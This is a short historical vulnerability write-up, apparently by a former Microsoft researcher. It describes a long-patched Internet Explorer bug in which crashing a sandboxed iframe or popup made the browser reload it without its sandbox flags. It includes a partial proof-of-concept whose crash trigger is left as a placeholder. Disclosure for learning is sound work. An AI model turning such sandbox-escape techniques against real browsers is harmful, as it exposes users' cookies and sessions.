I found that when a sandboxed window or tab crashed, IE automatically reloaded it — but the reload did not re-apply the sandbox flags. This meant that any denial-of-service vulnerability could be used as a sandbox escape: crash the sandboxed context, wait for the automatic reload, and the page now ran without restrictions. The PoC used the crash from bug Win8 #505970 as its trigger.

<!-- index.html -->
<iframe sandbox="allow-scripts allow-popups" src="sandboxed.html"></iframe>
<script>
document.cookie = "COOKIE WAS SET BY THE TOP-OPENER WINDOW";
</script>
// Inside sandboxed.html and its popup:
try
{
    // If we aren't sandboxed, the alert below will just show the cookie.
    alert(document.cookie);
}
catch (e)
{
    // Else, if we are sandboxed we crash the tab and IE will reload without the sandbox.
    // [Crash code from Win8 #505970]
}

After the crash and automatic reload, document.cookie in the previously sandboxed popup was accessible, demonstrating that the sandbox was not restored on reload.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.